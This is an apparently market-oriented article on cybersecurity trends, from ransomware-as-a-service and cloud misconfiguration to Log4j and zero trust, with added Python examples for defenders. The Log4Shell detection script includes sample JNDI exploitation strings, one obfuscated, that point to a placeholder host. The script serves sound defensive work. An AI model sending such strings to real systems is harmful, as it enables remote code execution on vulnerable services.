Cyberattacks are frequent and increasingly complex, perpetrated by those furthering a geopolitical cause or by attackers intent on making money. In 2021, the average number of cyberattacks and data breaches increased by 15.1% from the previous year. Homeworking, the ongoing digitization of society, and the increasingly online nature of our lives mean opportunities abound for phishers, hackers, scammers, and extortionists.
Maintaining the security of IT systems is a constant struggle for organisations of all types. In 2021, enterprises invested more in cybersecurity and cloud architecture due to employees working remotely during the pandemic. The global cyber security market size was valued at USD 184.93 billion in 2021 and is expected to expand at a compound annual growth rate (CAGR) of 12.0% from 2022 to 2030. This also sparked a mergers and acquisitions (M&A) boom in the tech sector.
The increasing number of cyber-attacks, together with the emergence of e-commerce platforms, the deployment of cloud solutions, and the proliferation of smart devices, are some of the factors driving market growth. Cyber threats are anticipated to evolve with the increasing use of devices built on intelligent and IoT technologies.
GlobalData has identified key technology trends impacting cybersecurity.
According to the UK National Cyber Security Centre, there were three times as many ransomware attacks in the first quarter of 2021 as there were in the whole of 2019. ENISA has described the threat picture as the “golden era of ransomware”—partly due to attackers’ multiple monetisation options. Ransomware is a multi-faceted offensive campaign that also involves an attack on the brand reputation of the victim. Attackers are now operating secondary monetisation channels, auctioning exfiltrated data on the dark web.
A Cybereason survey found that 35% of businesses that paid a ransom demand paid between $30,000 and $1.4m, while 7% paid ransoms exceeding $1.4m. About 25% of organisations reported that a ransomware attack had forced them to close down operations for some time.
Ransomware as a service (RaaS)
Ransomware as a service (RaaS) has become an established industry within the ransomware business. Operators will lease out or offer subscriptions to their malware creations for a price.
Ransomware as a Service (RaaS) is a business model between ransomware operators and affiliates in which affiliates pay to launch ransomware attacks developed by operators. The most sophisticated RaaS operators offer portals that let their subscribers see the status of infections, total payments, total files encrypted and other information about their targets. An affiliate can simply log into the RaaS portal, create an account, pay with Bitcoin, enter details on the type of malware they wish to create and click the submit button.
RaaS is business, and it’s big business: total ransomware revenues in 2020 were around $20 billion, up from $11.5 billion the previous year. The lucrative nature of RaaS and the difficulty of tracking down and prosecuting operators suggest that this business model will continue to flourish in 2022.
The cloud security segment is expected to exhibit the highest growth in the forecast period owing to the increasing adoption of cloud-based solutions by enterprises, due to their cost-effectiveness and the convenience of working with cloud-based platforms.
However, cloud-based platforms are always vulnerable to data breaches and cyber-attacks. In the absence of strong security measures, cyber attackers can target the misconfigurations of security settings to steal cloud data. A March 2022 ‘Cloud Security Report’ from Check Point Software, based on a survey of 775 cyber security professionals, revealed that cloud security incidents were up 10% from the previous year, with 27% of organisations citing misconfiguration, ahead of issues like exposed data or account compromise.
Cloud misconfiguration is typically caused by a lack of awareness of cloud security and policies; inadequate controls and oversight; too many cloud application programming interfaces (APIs) and interfaces to adequately govern the system; and negligent insider behaviour.
The growing risk of unauthorized access and the increasing number of threat actors across cloud layers, coupled with increasing malware infiltrations, are expected to compel enterprises to adopt cloud security solutions. Further, with growing web traffic to access media content, the need to filter this traffic is expected to drive the segment's growth.
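The misconfiguration the report cites most often is a security setting that opens data to everyone. As an added example (not from the report), this script reads a storage bucket policy in the AWS S3 JSON shape and flags Allow statements whose principal is anyone and which carry no Condition; the policy and account id are constructed.

```python
"""Flag cloud storage bucket policies that grant access to everyone.

Added example, not from the original article. Policy format follows the
AWS S3 bucket-policy JSON shape; the sample policy and account id are constructed.
"""
import json

SAMPLE_POLICY = json.dumps({  # constructed: one public and one scoped statement
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
         "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-bucket/*"},
        {"Sid": "AppWrite", "Effect": "Allow",
         "Principal": {"AWS": "arn:aws:iam::123456789012:role/app"},
         "Action": ["s3:PutObject"], "Resource": "arn:aws:s3:::example-bucket/*"},
    ],
})


def _is_public_principal(principal) -> bool:
    """'*' or {'AWS': '*'} (possibly inside a list) means anyone on the internet."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        aws = principal.get("AWS", [])
        return "*" in (aws if isinstance(aws, list) else [aws])
    return False


def find_public_statements(policy_json: str) -> list:
    """Return the Sids of Allow statements open to any principal with no Condition.

    A Condition block (for example a source-VPC restriction) may still scope the
    grant, so such statements are left for manual review rather than reported here.
    """
    policy = json.loads(policy_json)
    statements = policy.get("Statement", [])
    if isinstance(statements, dict):      # a single statement may be given unwrapped
        statements = [statements]
    findings = []
    for stmt in statements:
        if stmt.get("Effect") != "Allow":
            continue
        if not _is_public_principal(stmt.get("Principal")):
            continue
        if "Condition" in stmt:
            continue
        findings.append(stmt.get("Sid", "<no Sid>"))
    return findings


if __name__ == "__main__":
    print(find_public_statements(SAMPLE_POLICY))
```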
Convergence of security technology solutions
Secure access service edge (SASE) first emerged in 2019 as a cloud-based IT model that converges a range of previously separate security and networking functions into a single architecture that applies zero-trust principles to how access to data is managed. But SASE is in danger of being superseded by a new model, security service edge (SSE), which typically incorporates the security half of SASE and consists of secure web gateways, cloud access security brokers (CASB), and zero-trust network access (ZTNA).
The bottom line is that security technology convergence is accelerating, driven by a need to reduce complexity, cut administration overheads, and increase effectiveness.
Protecting chips from cyberattacks is becoming a necessity as chips end up in mission-critical servers and in leading-edge, safety-critical applications. As systems vendors and original equipment manufacturers (OEMs) increasingly design their own chips, rather than buying commercially developed devices, they are creating their own ecosystems and are, therefore, making security requirements much more of a home-grown concern.
Macroeconomics is a key driver. The discovery in 2017 of high-profile security vulnerabilities—notably Meltdown and Spectre—meant chip vendors had to patch their security holes with software. That meant that customers, who had upgraded their servers to make the most of new processors, then lost much of their performance improvement. That, in turn, forced them to add more servers to process the same volume of data in the same amount of time.
Supply chain threats
Intellectual property (IP) is the lifeblood of today’s globally integrated microelectronics supply chain. Protecting confidential information is vital to electronics companies around the world. Yet the supply chain is fraught with security risks. Malicious actors never rest in their work to infiltrate factory systems or human resources databases with the intent to steal IP, disrupt production or embed malicious software that can open the door to future attacks.
Cyberattacks targeting software supply chains are increasingly common and typically devastating. They came to the fore in 2020 when Russian hackers broke into SolarWinds’ systems and added malicious code to the company’s software system.
While thousands downloaded the malware, SolarWinds announced “the actual number of customers who were hacked through SUNBURST to be fewer than 100.” This number is consistent with estimates previously released by the White House.
These attacks are effective because they can take down an organisation’s entire software supply chain and services, resulting in massive business disruption. Organizations can evaluate their attack surface and develop systems and infrastructure to defend against threats and manage vulnerabilities.
Critical national infrastructure (CNI) threats
Cyber threats against CNI are increasing, and governments are taking steps to recognise them. The 7 May 2021 attack on the Colonial Pipeline fuel facility in the US alerted governments worldwide to the risks such an attack can bring to CNI.
In Australia, the list of regulated CNI sectors has expanded to include higher education and research, communications, banking and finance, data, defence, energy, food and grocery, healthcare, space technology, transport, and water and sewerage. This formal expansion of CNI coverage will become a global trend as governments address cyber risks.
CNI organisations are increasing anti-ransomware precautions, mandating multi-factor authentication for remote access and admin accounts, locking down and monitoring remote desktop protocol (RDP), and training employees to spot phishing attacks and other threats.
Internet of Things (IoT) threats
The number of connected devices – known as the internet of things (IoT) – is forecast to reach 18 billion by 2022. One consequence of this is a hugely increased number of potential access points for cybercriminals looking to gain access to secure digital systems. The IoT has long been recognised as a specific threat – attacks that have been identified in the past include hackers using connected household appliances like fridges and kettles to get access to networks, and from there go on to access computers or phones where valuable data could be stored.
The growing concern around IoT device security includes the fact that threat actors can not only damage the network and software that support IoT devices but also the devices themselves. Furthermore, IoT device adoption is advancing at a rate faster than the processes and protocols that can provide secure, reliable connections.
Device mismanagement and misconfiguration are significant concerns. Security oversights, poor password hygiene, and overall device mismanagement are all issues that can weaken IT security.
An attacker can infect an IoT device with malware through an unprotected port or phishing scams and co-opt it into an IoT botnet used to initiate massive cyber attacks.
Artificial intelligence (AI) and Cyber
Cyber-attacks are continuously increasing and becoming more sophisticated, creating large financial and other damage. New generations of malware and cyber-attacks are also difficult to detect with conventional cybersecurity methods. AI is essential to information security. It can swiftly analyse millions of datasets and identify various cyber threats. But attackers can also use AI as a weapon to design and carry out attacks. AI can mimic trusted actors, copying their actions and language. Using AI means attackers can also spot vulnerabilities more quickly, such as a network without protection or a downed firewall.
Artificial intelligence (AI) and machine learning can be trained to find attacks, which are similar to known attacks. Next generation Adaptive Machine Learning (ML) algorithms can collect intelligence about new threats, attacks and breaches and learn from them. AI can also automate processes for detecting attacks and reacting to breaches. In future, AI/ML can make cyber security fully automated.
On the other hand, AI is assisting in cybercrime and cyber warfare. AI can also find vulnerabilities that a human could not detect, as bots can use data from previous attacks to spot slight changes. Cybercriminals can use data collected from a specific user or other similar users to design an attack that works for a particular target. According to Symantec, cybercriminals are developing AI-enabled cyber-attacks that will cause an explosion of network penetration, personal data theft, and an epidemic-level spread of intelligent viruses in the coming years.
As nations develop smart city infrastructure, they are also becoming more vulnerable to cyber-attacks. Advanced threat actors can use AI systems to carry out massive distributed denial of service (DDoS) attacks. These attacks will bypass traditional security tools and can cause mass disruption to the operations of the infrastructure.
Nation states and militaries are developing AI-based extreme cyber weapons, including intelligent viruses to penetrate enemy networks. Again, we can see the dual nature of AI, and AI versus AI, as it is being used both to build autonomous cyber defence and to build AI-based extreme cyber weapons.
Although ransomware represents the biggest threat to organisations today, insider threats still pose a challenge as the job market shifts in the wake of the pandemic. With many employees changing jobs and companies trying to keep them by offering flexible working and vacation options, there is an increased risk of insider threat.
According to VMware, the number of employees leaving their jobs but potentially still having access to the corporate network or proprietary data has created a cybersecurity headache for IT and security teams.
The growing use of managed security services
The managed services segment is expected to register the highest growth rate of more than 10% over the forecast period. Managed security services (MSS) provision is growing. According to the UK government’s 2022 Cyber Security Breaches Survey, 40% of businesses and almost a third of charities (32%) use at least one managed service provider.
The high growth can be attributed to the increasing demand for outsourcing IT security services to monitor and maintain security solutions and actions. Managed services provide a cost-effective way to handle a company's IT security workload without requiring internal teams to manage it. Further, managed service providers are entirely focused on observing threat patterns and enhancing security operations, which is anticipated to mitigate cyber-attacks, thereby increasing the adoption of managed services.
The core of an MSS provider's (MSSP) business is in providing round-the-clock security monitoring and incident response for an enterprise's networks and endpoints. However, as enterprise networks grow and evolve, support for other platforms, such as cloud-based infrastructure, has become a critical component of an MSSP's security portfolio.
Using an MSSP is typically intended to augment or replace an organisation’s internal security team, while other services offered by providers include intrusion prevention systems (IPS), web content filtering, identity access management (IAM), privileged access management, vulnerability scanning, and threat intelligence.
New vulnerabilities are always coming to light, and they can be difficult to fix. One that emerged in December 2021, in an obscure but frequently used piece of software called Log4j, is a prime example. The Log4Shell bug affected devices and applications running vulnerable versions of the Log4j Java library.
Officials at the US Cybersecurity and Infrastructure Security Agency (CISA) warned that hundreds of millions of enterprise and consumer devices were at risk if the bug was not patched.
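Patching is the fix, but while the inventory is incomplete defenders also need to know whether exploitation strings are reaching their applications. As an added example (not from the article or from CISA), this script scans constructed web-server log lines for the Log4j JNDI lookup syntax that Log4Shell abuses, first collapsing the `${lower:x}`/`${upper:x}` wrappers that attackers used to split the keyword so that a plain substring match would miss it.

```python
"""Flag log lines carrying Log4j JNDI lookup strings (Log4Shell).

Added example, not from the original article. The log lines are constructed
and use reserved documentation/invalid hostnames, not real indicators.
"""
import re

# ${lower:x} / ${upper:x} case-conversion lookups used to break up the keyword
NESTED = re.compile(r"\$\{(?:lower|upper):([^{}$]*)\}", re.IGNORECASE)
# the lookup that triggers the vulnerable JNDI resolution
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

SAMPLE_LOGS = [  # constructed lines in a common-log-like format
    '203.0.113.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '203.0.113.9 - - "GET / HTTP/1.1" 200 "${jndi:ldap://example.invalid/x}"',
    '203.0.113.9 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:dns://example.invalid}"',
    '198.51.100.2 - - "GET /api HTTP/1.1" 500 "curl/7.79"',
]


def normalise(line: str) -> str:
    """Collapse case-conversion wrappers until none remain, so 'j' + 'ndi' rejoins."""
    prev = None
    while prev != line:
        prev = line
        line = NESTED.sub(lambda m: m.group(1), line)
    return line


def flag_jndi(lines):
    """Return (line_number, normalised_line) for each line containing a JNDI lookup."""
    hits = []
    for number, raw in enumerate(lines, 1):
        cleaned = normalise(raw)
        if JNDI.search(cleaned):
            hits.append((number, cleaned))
    return hits


if __name__ == "__main__":
    for number, line in flag_jndi(SAMPLE_LOGS):
        print(f"line {number}: {line}")
```

Matching the normalised text rather than the raw line is the point: the third sample line contains no literal `${jndi:` yet is reported.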
Zero trust adoption
The zero-trust security model is emerging as a long-term solution to data breaches for organisations. It eliminates the concept of trust from an organisation's network architecture. In a zero-trust world, only authorised individuals can access selected applications.
The underlying principle is that no implicit trust is granted to you as a user just because you are behind the corporate firewall. Zero trust recognises that trust is a vulnerability. Once on the network, users, including attackers, can move laterally and access or exfiltrate data.
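The difference between the two models is easiest to see in the access decision itself. As an added example (not from the article), this script evaluates the same constructed requests under a perimeter rule, which trusts any source inside the corporate range, and under a zero-trust rule, which checks identity, entitlement and device posture and ignores where the request came from; the entitlement table, address range and compliance flags are all constructed.

```python
"""Contrast a perimeter-trust rule with a zero-trust access decision.

Added example, not from the original article. The entitlement table, the
internal address range and the request attributes are constructed.
"""
from dataclasses import dataclass
from ipaddress import ip_address, ip_network

CORP_NET = ip_network("10.0.0.0/8")  # constructed: the "behind the firewall" range
# constructed: which identities are authorised for which application
ENTITLEMENTS = {"alice": {"payroll"}, "bob": {"wiki"}}


@dataclass
class AccessRequest:
    user: str
    app: str
    source_ip: str
    mfa_verified: bool
    device_compliant: bool


def perimeter_decision(req: AccessRequest) -> bool:
    """Legacy model: being on the corporate network is the whole check."""
    return ip_address(req.source_ip) in CORP_NET


def zero_trust_decision(req: AccessRequest) -> bool:
    """Every request is verified on identity, entitlement and device posture.

    The source network is deliberately not consulted: it adds no trust.
    """
    return (req.mfa_verified
            and req.device_compliant
            and req.app in ENTITLEMENTS.get(req.user, set()))


# constructed: a session on an internal host reaching for an app its user is not entitled to
LATERAL = AccessRequest("bob", "payroll", "10.1.2.3",
                        mfa_verified=False, device_compliant=True)
# constructed: an entitled user on a managed device working from outside the network
REMOTE = AccessRequest("alice", "payroll", "203.0.113.7",
                       mfa_verified=True, device_compliant=True)

if __name__ == "__main__":
    for name, req in (("lateral", LATERAL), ("remote", REMOTE)):
        print(name, "perimeter:", perimeter_decision(req),
              "zero-trust:", zero_trust_decision(req))
```

The perimeter rule allows the internal request and blocks the remote one; the zero-trust rule gives the opposite answers, which is the lateral-movement problem the paragraph describes.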
An offensive approach to cyber defence
The increasing number of attacks against CNI has led to cyber authorities worldwide working more closely together. According to US Cyber Command, the US military plays a more offensive, aggressive role in combating digital threats. The UK now has a National Cyber Force, whose activities build on a previous National Offensive Cyber Program. France also has a cyber strategy with both defensive and offensive capabilities.
The end of passwords is a prediction that comes around every year, but some progress is finally being made. In 2021, Microsoft announced that its users would no longer need passwords to log in to their accounts. Instead, they could use the Microsoft Authenticator app, Windows Hello, a security key, or a verification code sent to their phone or email to access apps and services.
This will likely benefit users and the IT staff, providing more back-end options that support password-less multi-factor authentication (MFA). However, it is challenging for businesses to transition away from passwords completely. Successful deployment requires companies to invest in the right resources, training, and end-user communication systems.
Extended detection and response (XDR)
XDR is an emerging cybersecurity model that is growing in its adoption and driving mergers and acquisitions (M&A). XDR is a series of tools and datasets that provides extended visibility, analysis, and response across networks and clouds in addition to apps and endpoints. Normal endpoint security typically focuses on containing and removing threats on endpoints and workloads.
XDR is designed to extend those capabilities beyond endpoint security to encompass multiple security control points to detect threats faster using data collected across domains.